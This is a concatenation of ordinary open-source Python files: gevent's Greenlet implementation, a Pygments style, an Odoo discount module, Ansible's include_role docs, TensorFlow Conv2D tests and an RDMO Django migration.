def __init__(self, callback):
if not callable(callback):
raise TypeError("Expected callable: %r" % (callback, ))
self.callback = callback
def __call__(self, source):
g = greenlet(self.callback, get_hub())
g.switch(source)
def __hash__(self):
return hash(self.callback)
def __eq__(self, other):
return self.callback == getattr(other, 'callback', other)
def __str__(self):
return str(self.callback)
def __repr__(self):
return repr(self.callback)
def __getattr__(self, item):
assert item != 'callback'
return getattr(self.callback, item)
class SuccessSpawnedLink(SpawnedLink):
"""A wrapper around link that calls it in another greenlet only if source succeed.
Can be called only from main loop.
"""
__slots__ = []
def __call__(self, source):
if source.successful():
return SpawnedLink.__call__(self, source)
class FailureSpawnedLink(SpawnedLink):
"""A wrapper around link that calls it in another greenlet only if source failed.
Can be called only from main loop.
"""
__slots__ = []
def __call__(self, source):
if not source.successful():
return SpawnedLink.__call__(self, source)
class Greenlet(greenlet):
"""A light-weight cooperatively-scheduled execution unit."""
def __init__(self, run=None, *args, **kwargs):
hub = get_hub()
greenlet.__init__(self, parent=hub)
if run is not None:
self._run = run
self.args = args
self.kwargs = kwargs
self._links = deque()
self.value = None
self._exception = _NONE
self._notifier = None
self._start_event = None
@property
def loop(self):
# needed by killall
return self.parent.loop
if PY3:
def __bool__(self):
return self._start_event is not None and self._exception is _NONE
else:
def __nonzero__(self):
return self._start_event is not None and self._exception is _NONE
@property
def started(self):
# DEPRECATED
return bool(self)
def ready(self):
"""Return true if and only if the greenlet has finished execution."""
return self.dead or self._exception is not _NONE
def successful(self):
"""Return true if and only if the greenlet has finished execution successfully,
that is, without raising an error."""
return self._exception is None
def __repr__(self):
classname = self.__class__.__name__
result = '<%s at %s' % (classname, hex(id(self)))
formatted = self._formatinfo()
if formatted:
result += ': ' + formatted
return result + '>'
def _formatinfo(self):
try:
return self._formatted_info
except AttributeError:
pass
try:
result = getfuncname(self.__dict__['_run'])
except Exception:
pass
else:
args = []
if self.args:
args = [repr(x)[:50] for x in self.args]
if self.kwargs:
args.extend(['%s=%s' % (key, repr(value)[:50]) for (key, value) in self.kwargs.items()])
if args:
result += '(' + ', '.join(args) + ')'
# it is important to save the result here, because once the greenlet exits '_run' attribute will be removed
self._formatted_info = result
return result
return ''
@property
def exception(self):
"""Holds the exception instance raised by the function if the greenlet has finished with an error.
Otherwise ``None``.
"""
if self._exception is not _NONE:
return self._exception
def throw(self, *args):
"""Immediatelly switch into the greenlet and raise an exception in it.
Should only be called from the HUB, otherwise the current greenlet is left unscheduled forever.
To raise an exception in a safely manner from any greenlet, use :meth:`kill`.
If a greenlet was started but never switched to yet, then also
a) cancel the event that will start it
b) fire the notifications as if an exception was raised in a greenlet
"""
if self._start_event is None:
self._start_event = _dummy_event
else:
self._start_event.stop()
try:
greenlet.throw(self, *args)
finally:
if self._exception is _NONE and self.dead:
# the greenlet was never switched to before and it will never be, _report_error was not called
# the result was not set and the links weren't notified. let's do it here.
# checking that self.dead is true is essential, because throw() does not necessarily kill the greenlet
# (if the exception raised by throw() is caught somewhere inside the greenlet).
if len(args) == 1:
arg = args[0]
#if isinstance(arg, type):
if type(arg) is type(Exception):
args = (arg, arg(), None)
else:
args = (type(arg), arg, None)
elif not args:
args = (GreenletExit, GreenletExit(), None)
self._report_error(args)
def start(self):
"""Schedule the greenlet to run in this loop iteration"""
if self._start_event is None:
self._start_event = self.parent.loop.run_callback(self.switch)
def start_later(self, seconds):
"""Schedule the greenlet to run in the future loop iteration *seconds* later"""
if self._start_event is None:
self._start_event = self.parent.loop.timer(seconds)
self._start_event.start(self.switch)
@classmethod
def spawn(cls, *args, **kwargs):
"""Return a new :class:`Greenlet` object, scheduled to start.
The arguments are passed to :meth:`Greenlet.__init__`.
"""
g = cls(*args, **kwargs)
g.start()
return g
@classmethod
def spawn_later(cls, seconds, *args, **kwargs):
"""Return a Greenlet object, scheduled to start *seconds* later.
The arguments are passed to :meth:`Greenlet.__init__`.
"""
g = cls(*args, **kwargs)
g.start_later(seconds)
return g
def kill(self, exception=GreenletExit, block=True, timeout=None):
"""Raise the exception in the greenlet.
If block is ``True`` (the default), wait until the greenlet dies or the optional timeout expires.
If block is ``False``, the current greenlet is not unscheduled.
The function always returns ``None`` and never raises an error.
`Changed in version 0.13.0:` *block* is now ``True`` by default.
"""
# XXX this function should not switch out if greenlet is not started but it does
# XXX fix it (will have to override 'dead' property of greenlet.greenlet)
if self._start_event is None:
self._start_event = _dummy_event
else:
self._start_event.stop()
if not self.dead:
waiter = Waiter()
self.parent.loop.run_callback(_kill, self, exception, waiter)
if block:
waiter.get()
self.join(timeout)
# it should be OK to use kill() in finally or kill a greenlet from more than one place;
# thus it should not raise when the greenlet is already killed (= not started)
def get(self, block=True, timeout=None):
"""Return the result the greenlet has returned or re-raise the exception it has raised.
If block is ``False``, raise :class:`gevent.Timeout` if the greenlet is still alive.
If block is ``True``, unschedule the current greenlet until the result is available
or the timeout expires. In the latter case, :class:`gevent.Timeout` is raised.
"""
if self.ready():
if self.successful():
return self.value
else:
raise self._exception
if block:
switch = getcurrent().switch
self.rawlink(switch)
try:
t = Timeout.start_new(timeout)
try:
result = self.parent.switch()
assert result is self, 'Invalid switch into Greenlet.get(): %r' % (result, )
finally:
t.cancel()
except:
# unlinking in 'except' instead of finally is an optimization:
# if switch occurred normally then link was already removed in _notify_links
# and there's no need to touch the links set.
# Note, however, that if "Invalid switch" assert was removed and invalid switch
# did happen, the link would remain, causing another invalid switch later in this greenlet.
self.unlink(switch)
raise
if self.ready():
if self.successful():
return self.value
else:
raise self._exception
else:
raise Timeout
def join(self, timeout=None):
"""Wait until the greenlet finishes or *timeout* expires.
Return ``None`` regardless.
"""
if self.ready():
return
else:
switch = getcurrent().switch
self.rawlink(switch)
try:
t = Timeout.start_new(timeout)
try:
result = self.parent.switch()
assert result is self, 'Invalid switch into Greenlet.join(): %r' % (result, )
finally:
t.cancel()
except Timeout:
self.unlink(switch)
if sys.exc_info()[1] is not t:
raise
except:
self.unlink(switch)
raise
def _report_result(self, result):
self._exception = None
self.value = result
if self._links and not self._notifier:
self._notifier = self.parent.loop.run_callback(self._notify_links)
def _report_error(self, exc_info):
exception = exc_info[1]
if isinstance(exception, GreenletExit):
self._report_result(exception)
return
self._exception = exception
if self._links and not self._notifier:
self._notifier = self.parent.loop.run_callback(self._notify_links)
self.parent.handle_error(self, *exc_info)
def run(self):
try:
if self._start_event is None:
self._start_event = _dummy_event
else:
self._start_event.stop()
try:
result = self._run(*self.args, **self.kwargs)
except:
self._report_error(sys.exc_info())
return
self._report_result(result)
finally:
self.__dict__.pop('_run', None)
self.__dict__.pop('args', None)
self.__dict__.pop('kwargs', None)
def rawlink(self, callback):
"""Register a callable to be executed when the greenlet finishes the execution.
WARNING: the callable will be called in the HUB greenlet.
"""
if not callable(callback):
raise TypeError('Expected callable: %r' % (callback, ))
self._links.append(callback)
if self.ready() and self._links and not self._notifier:
self._notifier = self.parent.loop.run_callback(self._notify_links)
def link(self, callback, SpawnedLink=SpawnedLink):
"""Link greenlet's completion to a callable.
The *callback* will be called with this instance as an argument
once this greenlet's dead. A callable is called in its own greenlet.
"""
self.rawlink(SpawnedLink(callback))
def unlink(self, callback):
"""Remove the callback set by :meth:`link` or :meth:`rawlink`"""
try:
self._links.remove(callback)
except ValueError:
pass
def link_value(self, callback, SpawnedLink=SuccessSpawnedLink):
"""Like :meth:`link` but *callback* is only notified when the greenlet has completed successfully"""
self.link(callback, SpawnedLink=SpawnedLink)
def link_exception(self, callback, SpawnedLink=FailureSpawnedLink):
"""Like :meth:`link` but *callback* is only notified when the greenlet dies because of unhandled exception"""
self.link(callback, SpawnedLink=SpawnedLink)
def _notify_links(self):
while self._links:
link = self._links.popleft()
try:
link(self)
except:
self.parent.handle_error((link, self), *sys.exc_info())
class _dummy_event(object):
def stop(self):
pass
_dummy_event = _dummy_event()
def _kill(greenlet, exception, waiter):
try:
greenlet.throw(exception)
except:
# XXX do we need this here?
greenlet.parent.handle_error(greenlet, *sys.exc_info())
waiter.switch()
def joinall(greenlets, timeout=None, raise_error=False, count=None):
if not raise_error:
wait(greenlets, timeout=timeout)
else:
for obj in iwait(greenlets, timeout=timeout):
if getattr(obj, 'exception', None) is not None:
raise obj.exception
if count is not None:
count -= 1
if count <= 0:
break
def _killall3(greenlets, exception, waiter):
diehards = []
for g in greenlets:
if not g.dead:
try:
g.throw(exception)
except:
g.parent.handle_error(g, *sys.exc_info())
if not g.dead:
diehards.append(g)
waiter.switch(diehards)
def _killall(greenlets, exception):
for g in greenlets:
if not g.dead:
try:
g.throw(exception)
except:
g.parent.handle_error(g, *sys.exc_info())
def killall(greenlets, exception=GreenletExit, block=True, timeout=None):
if not greenlets:
return
loop = greenlets[0].loop
if block:
waiter = Waiter()
loop.run_callback(_killall3, greenlets, exception, waiter)
t = Timeout.start_new(timeout)
try:
alive = waiter.get()
if alive:
joinall(alive, raise_error=False)
finally:
t.cancel()
else:
loop.run_callback(_killall, greenlets, exception)
if PY3:
_meth_self = "__self__"
else:
_meth_self = "im_self"
def getfuncname(func):
if not hasattr(func, _meth_self):
try:
funcname = func.__name__
except AttributeError:
pass
else:
if funcname != '<lambda>':
return funcname
return repr(func)
_NONE = Exception("Neither exception nor value")
|
qmarlats/pyquizz | refs/heads/master | env-3/lib/python3.5/site-packages/pygments/styles/algol.py | 37 | # -*- coding: utf-8 -*-
"""
pygments.styles.algol
~~~~~~~~~~~~~~~~~~~~~
Algol publication style.
This style renders source code for publication of algorithms in
scientific papers and academic texts, where its format is frequently used.
It is based on the style of the revised Algol-60 language report[1].
o No colours, only black, white and shades of grey are used.
o Keywords are rendered in lowercase underline boldface.
o Builtins are rendered in lowercase boldface italic.
o Docstrings and pragmas are rendered in dark grey boldface.
o Library identifiers are rendered in dark grey boldface italic.
o Comments are rendered in grey italic.
To render keywords without underlining, refer to the `Algol_Nu` style.
For lowercase conversion of keywords and builtins in languages where
these are not or might not be lowercase, a supporting lexer is required.
The Algol and Modula-2 lexers automatically convert to lowercase whenever
this style is selected.
[1] `Revised Report on the Algorithmic Language Algol-60 <http://www.masswerk.at/algol60/report.htm>`
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Operator
class AlgolStyle(Style):
background_color = "#ffffff"
default_style = ""
styles = {
Comment: "italic #888",
Comment.Preproc: "bold noitalic #888",
Comment.Special: "bold noitalic #888",
Keyword: "underline bold",
Keyword.Declaration: "italic",
Name.Builtin: "bold italic",
Name.Builtin.Pseudo: "bold italic",
Name.Namespace: "bold italic #666",
Name.Class: "bold italic #666",
Name.Function: "bold italic #666",
Name.Variable: "bold italic #666",
Name.Constant: "bold italic #666",
Operator.Word: "bold",
String: "italic #666",
Error: "border:#FF0000"
}
|
Innovahn/odoo.old | refs/heads/master | addons/product_visible_discount/product_visible_discount.py | 28 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class product_pricelist(osv.osv):
_inherit = 'product.pricelist'
_columns ={
'visible_discount': fields.boolean('Visible Discount'),
}
_defaults = {
'visible_discount': True,
}
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False,
fiscal_position=False, flag=False, context=None):
def get_real_price(res_dict, product_id, qty, uom, pricelist):
item_obj = self.pool.get('product.pricelist.item')
price_type_obj = self.pool.get('product.price.type')
product_obj = self.pool.get('product.product')
field_name = 'list_price'
product = product_obj.browse(cr, uid, product_id, context)
product_read = product_obj.read(cr, uid, [product_id], [field_name], context=context)[0]
factor = 1.0
if uom and uom != product.uom_id.id:
product_uom_obj = self.pool.get('product.uom')
uom_data = product_uom_obj.browse(cr, uid, product.uom_id.id)
factor = uom_data.factor
return product_read[field_name] * factor
res=super(sale_order_line, self).product_id_change(cr, uid, ids, pricelist, product, qty,
uom, qty_uos, uos, name, partner_id,
lang, update_tax, date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
context = {'lang': lang, 'partner_id': partner_id}
result=res['value']
pricelist_obj=self.pool.get('product.pricelist')
product_obj = self.pool.get('product.product')
if product and pricelist:
if result.get('price_unit',False):
price=result['price_unit']
else:
return res
product = product_obj.browse(cr, uid, product, context)
list_price = pricelist_obj.price_get(cr, uid, [pricelist],
product.id, qty or 1.0, partner_id, {'uom': uom,'date': date_order })
so_pricelist = pricelist_obj.browse(cr, uid, pricelist, context=context)
new_list_price = get_real_price(list_price, product.id, qty, uom, pricelist)
if so_pricelist.visible_discount and list_price[pricelist] != 0 and new_list_price != 0:
if product.company_id and so_pricelist.currency_id.id != product.company_id.currency_id.id:
# new_list_price is in company's currency while price in pricelist currency
ctx = context.copy()
ctx['date'] = date_order
new_list_price = self.pool['res.currency'].compute(cr, uid,
product.company_id.currency_id.id, so_pricelist.currency_id.id,
new_list_price, context=ctx)
discount = (new_list_price - price) / new_list_price * 100
if discount > 0:
result['price_unit'] = new_list_price
result['discount'] = discount
else:
result['discount'] = 0.0
else:
result['discount'] = 0.0
else:
result['discount'] = 0.0
return res
|
KohlsTechnology/ansible | refs/heads/devel | lib/ansible/modules/utilities/logic/include_role.py | 3 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'
}
DOCUMENTATION = '''
---
author: Ansible Core Team (@ansible)
module: include_role
short_description: Load and execute a role
description:
- Loads and executes a role as a task dynamically. This frees roles from the `roles:` directive and allows them to be
treated more as tasks.
- Unlike M(import_role), most keywords, including loops and conditionals, apply to this statement.
- This module is also supported for Windows targets.
version_added: "2.2"
options:
name:
description:
- The name of the role to be executed.
required: True
tasks_from:
description:
- File to load from a role's C(tasks/) directory.
default: main
vars_from:
description:
- File to load from a role's C(vars/) directory.
default: main
defaults_from:
description:
- File to load from a role's C(defaults/) directory.
default: main
allow_duplicates:
description:
- Overrides the role's metadata setting to allow using a role more than once with the same parameters.
type: bool
default: 'yes'
private:
description:
- If C(yes) the variables from C(defaults/) and C(vars/) in a role will not be made available to the rest of the
play.
type: bool
default: 'no'
notes:
- Handlers are made available to the whole play.
- Before Ansible 2.4, as with C(include), this task could be static or dynamic, If static, it implied that it won't
need templating, loops or conditionals and will show included tasks in the `--list` options. Ansible would try to
autodetect what is needed, but you can set `static` to `yes` or `no` at task level to control this.
- After Ansible 2.4, you can use M(import_role) for 'static' behaviour and this action for 'dynamic' one.
'''
EXAMPLES = """
- include_role:
name: myrole
- name: Run tasks/other.yaml instead of 'main'
include_role:
name: myrole
tasks_from: other
- name: Pass variables to role
include_role:
name: myrole
vars:
rolevar1: value from task
- name: Use role in loop
include_role:
name: myrole
with_items:
- '{{ roleinput1 }}'
- '{{ roleinput2 }}'
loop_control:
loop_var: roleinputvar
- name: Conditional role
include_role:
name: myrole
when: not idontwanttorun
"""
RETURN = """
# This module does not return anything except tasks to execute.
"""
|
dyoung418/tensorflow | refs/heads/master | tensorflow/compiler/tests/conv2d_test.py | 35 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Conv2D via the XLA JIT.
The canned results in these tests are created by running each test using the
Tensorflow CPU device and saving the output.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import googletest
class Conv2DTest(XLATestCase):
def _VerifyValues(self, input_sizes, filter_sizes, stride, padding, expected):
"""Tests that tf.nn.conv2d produces the expected value.
Args:
input_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
stride: Stride.
padding: Padding type.
expected: Expected output.
"""
total_size_1 = np.prod(input_sizes)
total_size_2 = np.prod(filter_sizes)
x1 = np.arange(1, total_size_1 + 1, dtype=np.float32).reshape(input_sizes)
x2 = np.arange(1, total_size_2 + 1, dtype=np.float32).reshape(filter_sizes)
strides = [1, stride, stride, 1]
with self.test_session() as sess:
with self.test_scope():
t1 = array_ops.placeholder(dtypes.float32, shape=input_sizes)
t2 = array_ops.placeholder(dtypes.float32, shape=filter_sizes)
out = nn_ops.conv2d(
t1, t2, strides=strides, padding=padding, data_format="NHWC")
value = sess.run(out, {t1: x1, t2: x2})
self.assertArrayNear(expected, np.ravel(value), 1e-3)
def testConv2D1x1Filter(self):
expected_output = [
30.0, 36.0, 42.0, 66.0, 81.0, 96.0, 102.0, 126.0, 150.0, 138.0, 171.0,
204.0, 174.0, 216.0, 258.0, 210.0, 261.0, 312.0
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[1, 1, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[1, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
stride=2,
padding="SAME",
expected=expected_output)
class Conv2DBackpropInputTest(XLATestCase):
def _VerifyValues(self, input_sizes, filter_sizes, out_backprop_sizes, stride,
padding, expected):
"""Tests that gen_nn_ops.conv2d_backprop_input produces the expected output.
Args:
input_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
out_backprop_sizes: Output gradients tensor dimensions.
stride: Stride.
padding: Padding type.
expected: Expected output.
"""
total_size_1 = np.prod(filter_sizes)
total_size_2 = np.prod(out_backprop_sizes)
x1 = np.arange(1, total_size_1 + 1, dtype=np.float32).reshape(filter_sizes)
x2 = np.arange(
1, total_size_2 + 1, dtype=np.float32).reshape(out_backprop_sizes)
strides = [1, stride, stride, 1]
with self.test_session() as sess:
with self.test_scope():
t1 = array_ops.placeholder(dtypes.float32, shape=filter_sizes)
t2 = array_ops.placeholder(dtypes.float32, shape=out_backprop_sizes)
out = gen_nn_ops.conv2d_backprop_input(
input_sizes=input_sizes,
filter=t1,
out_backprop=t2,
strides=strides,
padding=padding,
data_format="NHWC")
value = sess.run(out, {t1: x1, t2: x2})
self.assertArrayNear(expected, np.ravel(value), 1e-3)
def testConv2D1x1Filter(self):
expected_output = [
5, 11, 17, 11, 25, 39, 17, 39, 61, 23, 53, 83, 29, 67, 105, 35, 81, 127,
41, 95, 149, 47, 109, 171, 53, 123, 193, 59, 137, 215, 65, 151, 237, 71,
165, 259, 77, 179, 281, 83, 193, 303, 89, 207, 325, 95, 221, 347.
]
self._VerifyValues(
input_sizes=[1, 4, 4, 3],
filter_sizes=[1, 1, 3, 2],
out_backprop_sizes=[1, 4, 4, 2],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width5(self):
expected_output = [1, 2, 0, 2, 4]
self._VerifyValues(
input_sizes=[1, 1, 5, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width6(self):
expected_output = [1, 2, 0, 2, 4, 0]
self._VerifyValues(
input_sizes=[1, 1, 6, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width7(self):
expected_output = [1, 2, 0, 2, 4, 0, 0]
self._VerifyValues(
input_sizes=[1, 1, 7, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterC1Same(self):
expected_output = [1, 4, 7, 7, 23, 33]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 2, 3, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [
14, 32, 50, 100, 163, 226, 167, 212, 257, 122, 140, 158, 478, 541, 604,
437, 482, 527
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
out_backprop_sizes=[1, 1, 2, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterSame(self):
expected_output = [
14, 32, 50, 100, 163, 226, 217, 334, 451, 190, 307, 424, 929, 1217,
1505, 1487, 1883, 2279
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
out_backprop_sizes=[1, 2, 3, 3],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [1, 4, 4, 3, 10, 8, 5, 16, 12]
self._VerifyValues(
input_sizes=[1, 3, 3, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 3, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterSame(self):
expected_output = [1, 4, 7, 4, 13, 16, 7, 22, 25]
self._VerifyValues(
input_sizes=[1, 3, 3, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 3, 3, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [1, 2, 5, 4, 6, 0, 0, 0, 0, 0, 3, 6, 13, 8, 12]
self._VerifyValues(
input_sizes=[1, 3, 5, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 2, 2, 1],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [1, 2, 2, 3, 4, 6]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=2,
padding="SAME",
expected=expected_output)
class Conv2DBackpropFilterTest(XLATestCase):
def _VerifyValues(self, input_sizes, filter_sizes, out_backprop_sizes, stride,
padding, expected):
"""Tests that gen_nn_ops.conv2d_backprop_filter produces the right output.
Args:
input_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
out_backprop_sizes: Output gradients tensor dimensions.
stride: Stride.
padding: Padding type.
expected: Expected output.
"""
total_size_1 = np.prod(input_sizes)
total_size_2 = np.prod(out_backprop_sizes)
x1 = np.arange(1, total_size_1 + 1, dtype=np.float32).reshape(input_sizes)
x2 = np.arange(
1, total_size_2 + 1, dtype=np.float32).reshape(out_backprop_sizes)
strides = [1, stride, stride, 1]
with self.test_session() as sess:
with self.test_scope():
t1 = array_ops.placeholder(dtypes.float32, shape=input_sizes)
t2 = array_ops.placeholder(dtypes.float32, shape=out_backprop_sizes)
tensor = gen_nn_ops.conv2d_backprop_filter(
input=t1,
filter_sizes=filter_sizes,
out_backprop=t2,
strides=strides,
padding=padding,
data_format="NHWC")
value = sess.run(tensor, {t1: x1, t2: x2})
self.assertArrayNear(expected, np.ravel(value), 1e-3)
def testConv2D1x1Filter(self):
expected_output = [8056, 8432, 8312, 8704, 8568, 8976]
self._VerifyValues(
input_sizes=[1, 4, 4, 3],
filter_sizes=[1, 1, 3, 2],
out_backprop_sizes=[1, 4, 4, 2],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [120, 141]
self._VerifyValues(
input_sizes=[1, 3, 3, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 3, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterDepth1(self):
expected_output = [5, 8, 14, 17]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [
17, 22, 27, 22, 29, 36, 27, 36, 45, 32, 43, 54, 37, 50, 63, 42, 57, 72,
62, 85, 108, 67, 92, 117, 72, 99, 126, 77, 106, 135, 82, 113, 144, 87,
120, 153
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
out_backprop_sizes=[1, 1, 2, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width5(self):
expected_output = [9, 12]
self._VerifyValues(
input_sizes=[1, 1, 5, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width6(self):
expected_output = [9, 12]
self._VerifyValues(
input_sizes=[1, 1, 6, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width7(self):
expected_output = [9, 12]
self._VerifyValues(
input_sizes=[1, 1, 7, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x3Filter(self):
expected_output = [5, 8, 11]
self._VerifyValues(
input_sizes=[1, 1, 4, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x3FilterSame(self):
expected_output = [20, 30, 20]
self._VerifyValues(
input_sizes=[1, 1, 4, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 1, 4, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D1x3FilterSameOutbackprop2(self):
expected_output = [7, 10, 3]
self._VerifyValues(
input_sizes=[1, 1, 4, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=2,
padding="SAME",
expected=expected_output)
def testConv2D2x2FilterC1Same(self):
expected_output = [91, 58, 32, 17]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 2, 3, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [92, 102, 112]
self._VerifyValues(
input_sizes=[1, 3, 5, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 2, 2, 1],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [7, 2, 16, 5]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=2,
padding="SAME",
expected=expected_output)
if __name__ == "__main__":
googletest.main()
|
rdmorganiser/rdmo | refs/heads/master | rdmo/conditions/migrations/0020_require_uri_prefix.py | 1 | # Generated by Django 2.2.6 on 2019-10-29 12:08
from django.conf import settings
from django.db import migrations, models
def run_data_migration(apps, schema_editor):
for element in apps.get_model('conditions', 'Condition').objects.all():
element.uri_prefix = element.uri_prefix or settings.DEFAULT_URI_PREFIX
element.save()
class Migration(migrations.Migration):
dependencies = [
('conditions', '0019_django2'),
]
operations = [
migrations.RunPython(run_data_migration),
migrations.AlterField(
model_name='condition',
name='uri_prefix',
field=models.URLField(help_text='The prefix for the URI of this condition.', max_length=256, verbose_name='URI Prefix'),
),
]
|
salomon1184/bite-project | refs/heads/master | deps/mrtaskman/server/handlers/events.py | 16 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
